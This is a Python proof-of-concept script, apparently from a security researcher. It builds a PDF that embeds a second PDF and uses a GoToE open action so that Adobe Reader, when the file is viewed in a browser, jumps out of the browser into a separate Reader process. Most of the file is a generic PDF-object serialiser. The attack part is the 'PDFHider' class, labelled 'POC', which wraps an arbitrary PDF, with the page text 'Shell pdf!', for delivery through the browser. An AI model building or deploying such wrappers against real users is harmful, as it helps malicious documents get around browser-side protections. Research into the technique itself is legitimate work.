##########################################################################
#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com ####
#### http://twitter.com/feliam * http://wordpress.com/feliam ####
##########################################################################
__doc__ = '''
This opens a different Reader process when run from the browser. GotoE technique.
It expects a complete PDF to jump to from the browser.
Usage:
python escapeBrowser.py standalone.pdf > browser.pdf
'''
import struct,zlib,sys,hashlib,random
##TODO
## getattribute and setattribute must be pythonic!!
## References may be used to get actual object!
#For constructing a minimal pdf file
## PDF REference 3rd edition:: 3.2 Objects
class PDFObject:
    """Base class for every PDF object this module can serialize.

    Attributes:
      n -- object number; None until one is assigned (PDFDoc._add does this)
      v -- generation number; None until one is assigned

    Subclasses must override __str__ and return the object's PDF syntax.
    """
    def __init__(self):
        self.n = None
        self.v = None

    def __str__(self):
        """Abstract: raise NotImplementedError unless overridden."""
        # The original `raise "Fail"` used a string exception, which the
        # interpreter rejects with a confusing TypeError; raise a real
        # exception class carrying the same message instead.
        raise NotImplementedError("Fail")
## PDF REference 3rd edition:: 3.2.1 Booleans Objects
class PDFBool(PDFObject):
    """Boolean PDF object; renders as the keyword ``true`` or ``false``."""
    def __init__(self, s):
        PDFObject.__init__(self)
        # Any value is accepted; only its truthiness matters when rendering.
        self.s = s

    def __str__(self):
        """Return "true" when the stored value is truthy, else "false"."""
        return "true" if self.s else "false"
## PDF REference 3rd edition:: 3.2.2 Numeric Objects
class PDFNum(PDFObject):
    """Numeric PDF object; renders the stored value with ``%s`` formatting."""
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        """Return the stored value formatted as text."""
        number = self.s
        return "%s" % number
## PDF REference 3rd edition:: 3.2.3 String Objects
class PDFString(PDFObject):
    """Literal PDF string; renders the stored text wrapped in parentheses.

    The text is emitted as given: no escaping of parentheses or
    backslashes is performed here.
    """
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        """Return the stored text between "(" and ")"."""
        text = self.s
        return "(%s)" % text
## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings
class PDFHexString(PDFObject):
    """Hexadecimal PDF string; renders each character as hex inside <>."""
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        """Return "<" + lowercase hex of every character's ordinal + ">"."""
        # Each character becomes at least two zero-padded hex digits.
        digits = ["%02x" % ord(ch) for ch in self.s]
        return "<" + "".join(digits) + ">"
## A convenient type of literal Strings
class PDFOctalString(PDFObject):
    """Literal PDF string whose characters are all written as octal escapes.

    The conversion happens once, at construction time; ``self.s`` holds the
    already-escaped text (a backslash followed by three octal digits per
    input character).
    """
    def __init__(self, s):
        PDFObject.__init__(self)
        escaped = ["\\%03o" % ord(ch) for ch in s]
        self.s = "".join(escaped)

    def __str__(self):
        """Return the escaped text between "(" and ")"."""
        return "(%s)" % self.s
## PDF REference 3rd edition:: 3.2.4 Name Objects
class PDFName(PDFObject):
    """PDF name object; renders the stored text prefixed with a slash.

    The text is emitted as given; callers supply any ``#xx`` escapes
    themselves.
    """
    def __init__(self, s):
        PDFObject.__init__(self)
        self.s = s

    def __str__(self):
        """Return "/" followed by the stored name."""
        label = self.s
        return "/%s" % label
## PDF REference 3rd edition:: 3.2.5 Array Objects
class PDFArray(PDFObject):
    """PDF array; renders its elements space-separated inside brackets."""
    def __init__(self, s):
        PDFObject.__init__(self)
        # Iterable of elements; each must provide __str__.
        self.s = s

    def __str__(self):
        """Return "[" + the elements' renderings joined by spaces + "]"."""
        rendered = [item.__str__() for item in self.s]
        body = " ".join(rendered)
        return "[%s]" % body
## PDF REference 3rd edition:: 3.2.6 Dictionary Objects
class PDFDict(PDFObject):
    """PDF dictionary: maps key names (plain strings) to values.

    Entries live in ``self.dict``. Keys are rendered through PDFName and
    values through ``%s`` formatting, so a value may be a PDF object or any
    other object with a usable string form. Entries are also readable as
    attributes (``d.Type`` is ``d.dict['Type']``).
    """
    def __init__(self, d=None):
        """Create the dictionary, optionally copying the entries of *d*.

        d -- mapping of key name to value; it is copied, never kept.
        """
        PDFObject.__init__(self)
        self.dict = {}
        if d is not None:
            for k in d:
                self.dict[k] = d[k]

    def add(self, name, obj):
        """Set entry *name* to *obj*, replacing any previous value."""
        self.dict[name] = obj

    def __getattr__(self, name):
        """Expose dictionary entries as attributes.

        Only called when normal attribute lookup fails. Raises
        AttributeError (carrying the attribute name) for unknown entries.
        """
        # Go through the instance __dict__ so that a missing ``dict``
        # attribute (instance not initialised yet) yields a plain
        # AttributeError instead of recursing back into __getattr__.
        try:
            return self.__dict__['dict'][name]
        except KeyError:
            raise AttributeError(name)

    def __str__(self):
        """Return "<<" + every "/Key value " pair + ">>".

        Pairs appear in the iteration order of the underlying dict.
        """
        entries = ["%s %s " % (PDFName(name), self.dict[name])
                   for name in self.dict]
        return "<<" + "".join(entries) + ">>"
## PDF REference 3rd edition:: 3.2.7 Stream Objects
class PDFStream(PDFDict):
    """PDF stream: a dictionary followed by (optionally filtered) data.

    Attributes:
      stream   -- the raw, unfiltered data
      filtered -- the data after every filter in ``filters`` was applied
      filters  -- filter objects, applied in list order; each provides
                  ``encode(data)`` and a ``name`` attribute
    """
    def __init__(self, stream=""):
        PDFDict.__init__(self)
        self.stream = stream
        self.filtered = self.stream
        self.filters = []

    def appendFilter(self, filter):
        """Add *filter* to the end of the chain and re-encode the data."""
        self.filters.append(filter)
        # The whole chain is recomputed on every append.
        self._applyFilters()

    def _applyFilters(self):
        """Recompute ``filtered`` and refresh the Length/Filter entries."""
        self.filtered = self.stream
        for stage in self.filters:
            self.filtered = stage.encode(self.filtered)
        # Length always reflects the encoded data.
        self.add('Length', len(self.filtered))
        if self.filters:
            self.add('Filter', PDFArray([stage.name for stage in self.filters]))
        # Filter parameters are not emitted.

    def __str__(self):
        """Return the dictionary, then the data between stream/endstream."""
        # Re-applied on every rendering so the output matches the current
        # ``stream`` and ``filters`` values.
        self._applyFilters()
        header = PDFDict.__str__(self)
        return header + "\nstream\n" + self.filtered + "\nendstream"
## PDF REference 3rd edition:: 3.2.8 Null Object
class PDFNull(PDFObject):
    """The PDF null object; always renders as the keyword ``null``."""
    def __init__(self):
        PDFObject.__init__(self)

    def __str__(self):
        """Return the literal text "null"."""
        keyword = "null"
        return keyword
## PDF REference 3rd edition:: 3.2.9 Indirect Objects
class PDFRef(PDFObject):
    """Indirect reference to another object, rendered as ``n v R``.

    The target's numbers are read at rendering time, so a reference may be
    created before its target has been given an object number.
    """
    def __init__(self, obj):
        PDFObject.__init__(self)
        # The target is kept inside a one-element list.
        self.obj = [obj]

    def __str__(self):
        """Return "<object number> <generation> R" for the target."""
        target = self.obj[0]
        return "%d %d R" % (target.n, target.v)

    def get(self):
        """Return the referenced object."""
        return self.obj[0]
## PDF REference 3rd edition:: 3.3 Filters
## Example Filter...
class FlateDecode:
    """Stream filter backed by zlib.

    ``name`` is the PDFName written into a stream's Filter array.
    """
    name = PDFName('FlateDecode')

    def __init__(self):
        pass

    def encode(self, stream):
        """Return *stream* compressed with zlib.compress."""
        packed = zlib.compress(stream)
        return packed

    def decode(self, stream):
        """Return *stream* decompressed with zlib.decompress."""
        unpacked = zlib.decompress(stream)
        return unpacked
## PDF REference 3rd edition:: 3.4 File Structure
## Simplest file structure...
class PDFDoc():
    """Minimal PDF file: header, numbered objects, xref table and trailer.

    Objects are registered with add(), which numbers them 1, 2, 3, ... in
    registration order. str(doc) renders the complete file. A root object
    must be set with setRoot() before rendering; an info object is
    optional.
    """
    def __init__(self, obfuscate=0):
        """Create an empty document. *obfuscate* is accepted but unused."""
        self.objs = []
        self.info = None
        self.root = None

    def setRoot(self, root):
        """Set the object referenced by the trailer's Root entry."""
        self.root = root

    def getRoot(self):
        """Return the object set with setRoot(), or None."""
        return self.root

    def setInfo(self, info):
        """Set the object referenced by the trailer's Info entry."""
        self.info = info

    def _add(self, obj):
        """Register one object and assign its object/generation numbers.

        Raises ValueError if the object already carries a number.
        """
        if obj.v is not None or obj.n is not None:
            # The original raised a string, which is not a valid exception.
            raise ValueError("Already added!!!")
        obj.v = 0
        obj.n = 1 + len(self.objs)
        self.objs.append(obj)

    def add(self, obj):
        """Register a single object, or every object of a list, in order."""
        if isinstance(obj, list):
            for o in obj:
                self._add(o)
        else:
            self._add(obj)

    def _header(self):
        """Return the version line followed by a comment of high bytes."""
        return "%PDF-1.3\n%\xE7\xF3\xCF\xD3\n"

    def __str__(self):
        """Render the whole file and return it as one string."""
        # Collect the pieces in a list and keep a running length, so each
        # object's offset is known without re-measuring the whole output.
        parts = [self._header()]
        size = len(parts[0])
        xref = {}
        for obj in self.objs:
            xref[obj.n] = size
            chunk = "%d %d obj\n" % (obj.n, obj.v) + obj.__str__() + "\nendobj\n"
            parts.append(chunk)
            size += len(chunk)
        posxref = size

        parts.append("xref\n")
        parts.append("0 %d\n" % (len(self.objs) + 1))
        parts.append("0000000000 65535 f \n")
        # Entry position in the table identifies the object, so emit the
        # offsets in ascending object-number order rather than in whatever
        # order the dict happens to iterate.
        for number in sorted(xref):
            parts.append("%010d %05d n \n" % (xref[number], 0))

        parts.append("trailer\n")
        trailer = PDFDict()
        trailer.add("Size", len(self.objs) + 1)
        trailer.add("Root", PDFRef(self.root))
        if self.info:
            trailer.add("Info", PDFRef(self.info))
        parts.append(trailer.__str__())
        parts.append("\nstartxref\n%d\n" % posxref)
        # Not a format string: both percent signs are written literally.
        parts.append("%%EOF")
        return "".join(parts)
class FlateDecode:
    """Stream filter backed by zlib.

    NOTE: this file defines FlateDecode twice with the same body; this
    later definition rebinds the module-level name.
    ``name`` is the PDFName written into a stream's Filter array.
    """
    name = PDFName('FlateDecode')

    def __init__(self):
        pass

    def encode(self, stream):
        """Return *stream* compressed with zlib.compress."""
        deflated = zlib.compress(stream)
        return deflated

    def decode(self, stream):
        """Return *stream* decompressed with zlib.decompress."""
        inflated = zlib.decompress(stream)
        return inflated
#The ... 'POC'
class PDFHider:
    """Build a one-page PDF that embeds another PDF and jumps into it.

    The generated document holds the given PDF as a Flate-compressed
    embedded file registered under the name 'attach', plus a GoToE action
    targeting that name. The action is attached to the single page through
    its 'AA' dictionary ('O' entry). str(instance) renders the document.
    """
    def _gotoE(self, name, next=None):
        """Return a GoToE action dictionary targeting embedded file *name*.

        name -- PDF object used as the target's 'N' entry
        next -- optional value stored under 'Next' when truthy
        """
        action = PDFDict()
        action.add('S', PDFName('GoToE'))
        action.add('NewWindow', PDFBool(self.newWindow))
        action.add('T', PDFDict({'N': name, 'R': PDFName('C'),
                                 'NewWindow': PDFBool(self.newWindow)}))
        if next:
            action.add('Next', next)
        return action

    def _zipEmbeddFile(self, fileStr, minimal=False):
        """Return a Flate-compressed embedded-file stream holding *fileStr*.

        With minimal=True the descriptive entries (Type, Subtype, Params,
        DL) are left out and only the filtered stream is produced.
        """
        ef = PDFStream(fileStr)
        if not minimal:
            ef.add('Type', PDFName('EmbeddedFile'))
            # '#2F' is the name-escape for '/', i.e. application/pdf.
            ef.add('Subtype', PDFName('application#2Fpdf'))
            ef.add('Params', PDFDict({
                'Size': PDFNum(len(fileStr)),
                'CheckSum': PDFOctalString(hashlib.md5(fileStr).digest())}))
            ef.add('DL', ' %d ' % len(fileStr))
        ef.appendFilter(FlateDecode())
        return ef

    def _filespec(self, name, embedded):
        """Register a file specification for *embedded*; return a reference.

        name     -- file name written as the 'F' string
        embedded -- the embedded-file stream object (already in the doc)
        """
        filespec = PDFDict()
        filespec.add('Type', PDFName('Filespec'))
        filespec.add('F', PDFString(name))
        embeddedlst = PDFDict()
        embeddedlst.add('F', PDFRef(embedded))
        filespec.add('EF', embeddedlst)
        self.doc.add(filespec)
        return PDFRef(filespec)

    def __init__(self, fileStr, filename, newWindow=True):
        """Assemble the document.

        fileStr   -- contents of the PDF to embed; when None the contents
                     are read from *filename*
        filename  -- name recorded in the file specification
        newWindow -- value written to the action's NewWindow entries

        The order of the self.doc.add() calls fixes the object numbers and
        is kept exactly as before.
        """
        self.newWindow = newWindow
        if fileStr is None:
            # Binary mode keeps the embedded bytes intact on every
            # platform, and the context manager closes the handle.
            with open(filename, 'rb') as handle:
                fileStr = handle.read()
        self.doc = PDFDoc()

        # outline
        outlines = PDFDict()
        outlines.add('Type', PDFName('Outlines'))
        outlines.add('Count', PDFNum(0))

        # pages
        pages = PDFDict()
        pages.add('Type', PDFName('Pages'))

        # The action is registered first, so it becomes object 1.
        action = self._gotoE(PDFHexString('attach'.encode('utf-16')))
        self.doc.add(action)

        # Names (filled in and registered at the end)
        names = PDFDict()

        # catalog
        catalog = PDFDict()
        catalog.add('Type', PDFName('Catalog'))
        catalog.add('Outlines', PDFRef(outlines))
        catalog.add('Pages', PDFRef(pages))
        catalog.add('Names', PDFRef(names))
        catalog.add('ViewerPreferences', '<<>>')
        self.doc.add([catalog, outlines, pages])
        self.doc.setRoot(catalog)

        # 1 page!
        font = PDFDict()
        font.add('Type', PDFName('Font'))
        font.add('Subtype', PDFName('Type1'))
        font.add('Name', PDFName('F1'))
        font.add('BaseFont', PDFName('Helvetica'))
        font.add('Encoding', PDFName('MacRomanEncoding'))
        self.doc.add(font)

        contents = PDFStream('BT /F1 24 Tf 0 20 Td (Shell pdf!) Tj ET')
        resources = PDFDict()
        resources.add('ProcSet', PDFArray([PDFName('PDF'), PDFName('Text')]))
        resources.add('Font', PDFDict({'F1': PDFRef(font)}))

        # The pdf page
        page = PDFDict()
        page.add('Type', PDFName('Page'))
        page.add('Parent', PDFRef(pages))
        page.add('Contents', PDFRef(contents))
        page.add('Resources', PDFRef(resources))
        # PDFDoc.add accepts a list and registers its items in order.
        self.doc.add([contents, resources, page])
        pages.add('Count', PDFNum(1))
        pages.add('Kids', PDFArray([PDFRef(page)]))

        embedded = self._zipEmbeddFile(fileStr)
        self.doc.add(embedded)

        # Names: map the 'attach' key to the file specification. The key
        # bytes are produced exactly as for the action target above, so
        # the two match. _filespec registers the filespec object before
        # `names` is registered.
        namesToFiles = PDFDict()
        namesToFiles.add('Names', PDFArray([
            PDFHexString('attach'.encode('utf-16')),
            self._filespec(filename, embedded)]))
        names.add('EmbeddedFiles', namesToFiles)
        self.doc.add(names)

        # open action to page
        page.add('AA', PDFDict({'O': PDFRef(action)}))

    def __str__(self):
        """Render the assembled document."""
        return self.doc.__str__()
if __name__=='__main__':
    # Script entry point: wrap the PDF named on the command line and write
    # the resulting document to standard output.
    if len(sys.argv) == 1:
        # No input file given: show the usage text and exit with an error.
        print(__doc__)
        sys.exit(-1)
    filename = sys.argv[1]
    # A PDF is binary data: read it in binary mode so no newline
    # translation is applied, and close the handle once read.
    with open(filename, "rb") as source:
        pdf = source.read()
    print(str(PDFHider(pdf, filename, True)))